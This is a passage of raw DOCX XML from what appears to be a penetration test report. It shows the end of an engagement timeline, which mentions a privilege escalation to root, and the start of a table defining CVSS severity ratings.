          <w:p w14:paraId="1F51ADAC" w14:textId="4F6E41AE" w:rsidR="00FC56AD" w:rsidRDefault="00EA1B34" w:rsidP="00110678">
            <w:pPr>
              <w:spacing w:before="240"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">6.21.23 </w:t>
            </w:r>
            <w:r>
              <w:t>–</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> 10:00 A.M.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5395" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1B806BC4" w14:textId="5309064B" w:rsidR="00FC56AD" w:rsidRDefault="00EA1B34" w:rsidP="00110678">
            <w:pPr>
              <w:spacing w:before="240"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Privilege escalation exploit; Shell as root user</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D92C42" w14:paraId="7C372007" w14:textId="77777777" w:rsidTr="0062735B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5395" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1B41ECC9" w14:textId="08EEBE55" w:rsidR="00D92C42" w:rsidRDefault="00D92C42" w:rsidP="00110678">
            <w:pPr>
              <w:spacing w:before="240"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">6.21.23 </w:t>
            </w:r>
            <w:r>
              <w:t>–</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> 10:15 A.M.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5395" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4B2597A3" w14:textId="41306C31" w:rsidR="00D92C42" w:rsidRDefault="00110678" w:rsidP="00110678">
            <w:pPr>
              <w:spacing w:before="240"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Ending of penetration test</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5AE8CC22" w14:textId="77777777" w:rsidR="00CB1007" w:rsidRPr="00306AB4" w:rsidRDefault="00CB1007" w:rsidP="00306AB4"/>
    <w:p w14:paraId="1391585A" w14:textId="442CAE04" w:rsidR="00142A90" w:rsidRDefault="00142A90" w:rsidP="00332229">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pageBreakBefore/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc141061095"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Finding</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Severity</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Ratings</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="49F73249" w14:textId="77777777" w:rsidR="00142A90" w:rsidRPr="007859A3" w:rsidRDefault="00142A90" w:rsidP="00142A90">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="273"/>
        <w:ind w:left="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007859A3">
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The</w:t>
      </w:r>
      <w:r w:rsidRPr="007859A3">
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
          <w:spacing w:val="24"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007859A3">
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>following</w:t>
      </w:r>
      <w:r w:rsidRPr="007859A3">
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
          <w:spacing w:val="24"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007859A3">
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>table</w:t>
      </w:r>
      <w:r w:rsidRPr="007859A3">
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
          <w:spacing w:val="24"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007859A3">
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>defines</w:t>
      </w:r>
      <w:r w:rsidRPr="007859A3">
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
          <w:spacing w:val="26"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007859A3">
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>levels</w:t>
      </w:r>
      <w:r w:rsidRPr="007859A3">
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
          <w:spacing w:val="26"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007859A3">
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>of</w:t>
      </w:r>
      <w:r w:rsidRPr="007859A3">
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
          <w:spacing w:val="24"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007859A3">
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>severity</w:t>
      </w:r>
      <w:r w:rsidRPr="007859A3">
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
          <w:spacing w:val="24"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007859A3">
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidRPr="007859A3">
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
          <w:spacing w:val="26"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007859A3">
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>corresponding</w:t>
      </w:r>
      <w:r w:rsidRPr="007859A3">
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
          <w:spacing w:val="24"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007859A3">
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>CVSS</w:t>
      </w:r>
      <w:r w:rsidRPr="007859A3">
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
          <w:spacing w:val="26"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007859A3">
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>score</w:t>
      </w:r>
      <w:r w:rsidRPr="007859A3">
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
          <w:spacing w:val="25"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007859A3">
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>range</w:t>
      </w:r>
      <w:r w:rsidRPr="007859A3">
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
          <w:spacing w:val="24"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007859A3">
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>that</w:t>
      </w:r>
      <w:r w:rsidRPr="007859A3">
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
          <w:spacing w:val="25"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007859A3">
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>are</w:t>
      </w:r>
      <w:r w:rsidRPr="007859A3">
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
          <w:spacing w:val="24"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007859A3">
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>used throughout the document to assess vulnerability and risk impact.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B510033" w14:textId="77777777" w:rsidR="00142A90" w:rsidRPr="00FA1072" w:rsidRDefault="00142A90" w:rsidP="00142A90">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="9"/>
        <w:rPr>
          <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
          <w:sz w:val="23"/>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1505"/>
        <w:gridCol w:w="6775"/>
      </w:tblGrid>
      <w:tr w:rsidR="00142A90" w:rsidRPr="00FA1072" w14:paraId="0C670966" w14:textId="77777777" w:rsidTr="00485380">
        <w:trPr>
          <w:trHeight w:val="539"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1999" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="99B8EB"/>
          </w:tcPr>
          <w:p w14:paraId="5D816AA9" w14:textId="77777777" w:rsidR="00142A90" w:rsidRPr="00FA1072" w:rsidRDefault="00142A90" w:rsidP="003F11B7">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="137"/>
              <w:ind w:left="149" w:right="130"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FA1072">
              <w:rPr>
                <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:spacing w:val="-2"/>
              </w:rPr>
              <w:t>Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1505" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="99B8EB"/>
          </w:tcPr>
          <w:p w14:paraId="48E5AFD5" w14:textId="77777777" w:rsidR="00142A90" w:rsidRPr="00FA1072" w:rsidRDefault="00142A90" w:rsidP="003F11B7">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="1" w:line="258" w:lineRule="exact"/>
              <w:ind w:left="124" w:right="106"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FA1072">
              <w:rPr>
                <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>CVSS</w:t>
            </w:r>
            <w:r w:rsidRPr="00FA1072">
              <w:rPr>
                <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:spacing w:val="-10"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00FA1072">
              <w:rPr>
                <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:spacing w:val="-5"/>
              </w:rPr>
              <w:t>V3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E97616F" w14:textId="77777777" w:rsidR="00142A90" w:rsidRPr="00FA1072" w:rsidRDefault="00142A90" w:rsidP="003F11B7">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="258" w:lineRule="exact"/>
              <w:ind w:left="126" w:right="106"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FA1072">
              <w:rPr>
                <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Score</w:t>
            </w:r>
            <w:r w:rsidRPr="00FA1072">
              <w:rPr>
                <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:spacing w:val="-12"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00FA1072">
              <w:rPr>
                <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:spacing w:val="-2"/>
              </w:rPr>
              <w:t>Range</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6775" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="99B8EB"/>
          </w:tcPr>
          <w:p w14:paraId="0081BE1D" w14:textId="565CCFF1" w:rsidR="00142A90" w:rsidRPr="00FA1072" w:rsidRDefault="00142A90" w:rsidP="003F11B7">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="137"/>
              <w:ind w:left="2787" w:right="2767"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FA1072">
              <w:rPr>
                <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:spacing w:val="-2"/>
              </w:rPr>
              <w:t>Definiti</w:t>
            </w:r>
            <w:r w:rsidR="002D135D">
              <w:rPr>
                <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:spacing w:val="-2"/>
              </w:rPr>
              <w:t>o</w:t>
            </w:r>
            <w:r w:rsidRPr="00FA1072">
              <w:rPr>
                <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:spacing w:val="-2"/>
              </w:rPr>
              <w:t>n</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00142A90" w:rsidRPr="00FA1072" w14:paraId="4D8DE3D1" w14:textId="77777777" w:rsidTr="00485380">
        <w:trPr>
          <w:trHeight w:val="953"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1999" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C00000"/>
          </w:tcPr>
          <w:p w14:paraId="67E03DA2" w14:textId="77777777" w:rsidR="00142A90" w:rsidRPr="00FA1072" w:rsidRDefault="00142A90" w:rsidP="003F11B7">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="10"/>
              <w:ind w:left="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
                <w:sz w:val="27"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="20A9624F" w14:textId="77777777" w:rsidR="00142A90" w:rsidRPr="00FA1072" w:rsidRDefault="00142A90" w:rsidP="003F11B7">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="150" w:right="127"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
                <w:sz w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FA1072">
              <w:rPr>
                <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
                <w:color w:val="FFFFFF"/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1505" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1D2D2274" w14:textId="77777777" w:rsidR="00142A90" w:rsidRPr="00FA1072" w:rsidRDefault="00142A90" w:rsidP="003F11B7">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="5"/>
              <w:ind w:left="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
                <w:sz w:val="31"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="678F86FE" w14:textId="77777777" w:rsidR="00142A90" w:rsidRPr="00FA1072" w:rsidRDefault="00142A90" w:rsidP="003F11B7">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="126" w:right="102"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FA1072">
              <w:rPr>
                <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>9.0-</w:t>
            </w:r>
            <w:r w:rsidRPr="00FA1072">
              <w:rPr>
                <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
                <w:spacing w:val="-4"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>10.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6775" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="083AA9B9" w14:textId="77777777" w:rsidR="00142A90" w:rsidRPr="00FA1072" w:rsidRDefault="00142A90" w:rsidP="003F11B7">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="119"/>
              <w:ind w:left="114" w:right="93"/>
              <w:rPr>
                <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FA1072">
              <w:rPr>
                <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Exploitation</w:t>
            </w:r>
            <w:r w:rsidRPr="00FA1072">
              <w:rPr>
                <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
                <w:spacing w:val="-5"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00FA1072">
              <w:rPr>
                <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>is</w:t>
            </w:r>
            <w:r w:rsidRPr="00FA1072">
              <w:rPr>
                <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
                <w:spacing w:val="-5"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00FA1072">
              <w:rPr>
                <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>straightforward</w:t>
            </w:r>
            <w:r w:rsidRPr="00FA1072">
              <w:rPr>
                <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
                <w:spacing w:val="-6"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00FA1072">
              <w:rPr>
                <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>and</w:t>
            </w:r>
            <w:r w:rsidRPr="00FA1072">
              <w:rPr>
                <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
                <w:spacing w:val="-7"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00FA1072">
              <w:rPr>
                <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>usually</w:t>
            </w:r>
            <w:r w:rsidRPr="00FA1072">
              <w:rPr>
                <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
                <w:spacing w:val="-5"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00FA1072">
              <w:rPr>
                <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>results</w:t>
            </w:r>
            <w:r w:rsidRPr="00FA1072">
              <w:rPr>
                <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
                <w:spacing w:val="-5"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00FA1072">
              <w:rPr>
                <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>in</w:t>
            </w:r>
            <w:r w:rsidRPr="00FA1072">
              <w:rPr>
                <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
                <w:spacing w:val="-5"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00FA1072">
              <w:rPr>
                <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">system-level compromise. It is advised to form a plan of action and patch </w:t>
            </w:r>
            <w:r w:rsidRPr="00FA1072">
              <w:rPr>
                <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>immediately.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00142A90" w:rsidRPr="00FA1072" w14:paraId="369357B7" w14:textId="77777777" w:rsidTr="00485380">
        <w:trPr>
          <w:trHeight w:val="953"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1999" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF0000"/>
          </w:tcPr>
          <w:p w14:paraId="576998F3" w14:textId="77777777" w:rsidR="00142A90" w:rsidRPr="00FA1072" w:rsidRDefault="00142A90" w:rsidP="003F11B7">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
                <w:sz w:val="28"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="091D7BD2" w14:textId="77777777" w:rsidR="00142A90" w:rsidRPr="00FA1072" w:rsidRDefault="00142A90" w:rsidP="003F11B7">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="150" w:right="130"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
                <w:sz w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FA1072">
              <w:rPr>
                <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
                <w:color w:val="FFFFFF"/>
                <w:spacing w:val="-4"/>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1505" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4B23DD16" w14:textId="77777777" w:rsidR="00142A90" w:rsidRPr="00FA1072" w:rsidRDefault="00142A90" w:rsidP="003F11B7">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="5"/>
              <w:ind w:left="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Avenir Next LT Pro" w:hAnsi="Avenir Next LT Pro"/>
                <w:sz w:val="31"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="39E57EDE" w14:textId="77777777" w:rsidR="00142A90" w:rsidRPr="00FA1072" w:rsidRDefault="00142A90" w:rsidP="003F11B7">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="126" w:right="101"/>
              <w:jc w:val="center"/>
              <w:rPr>
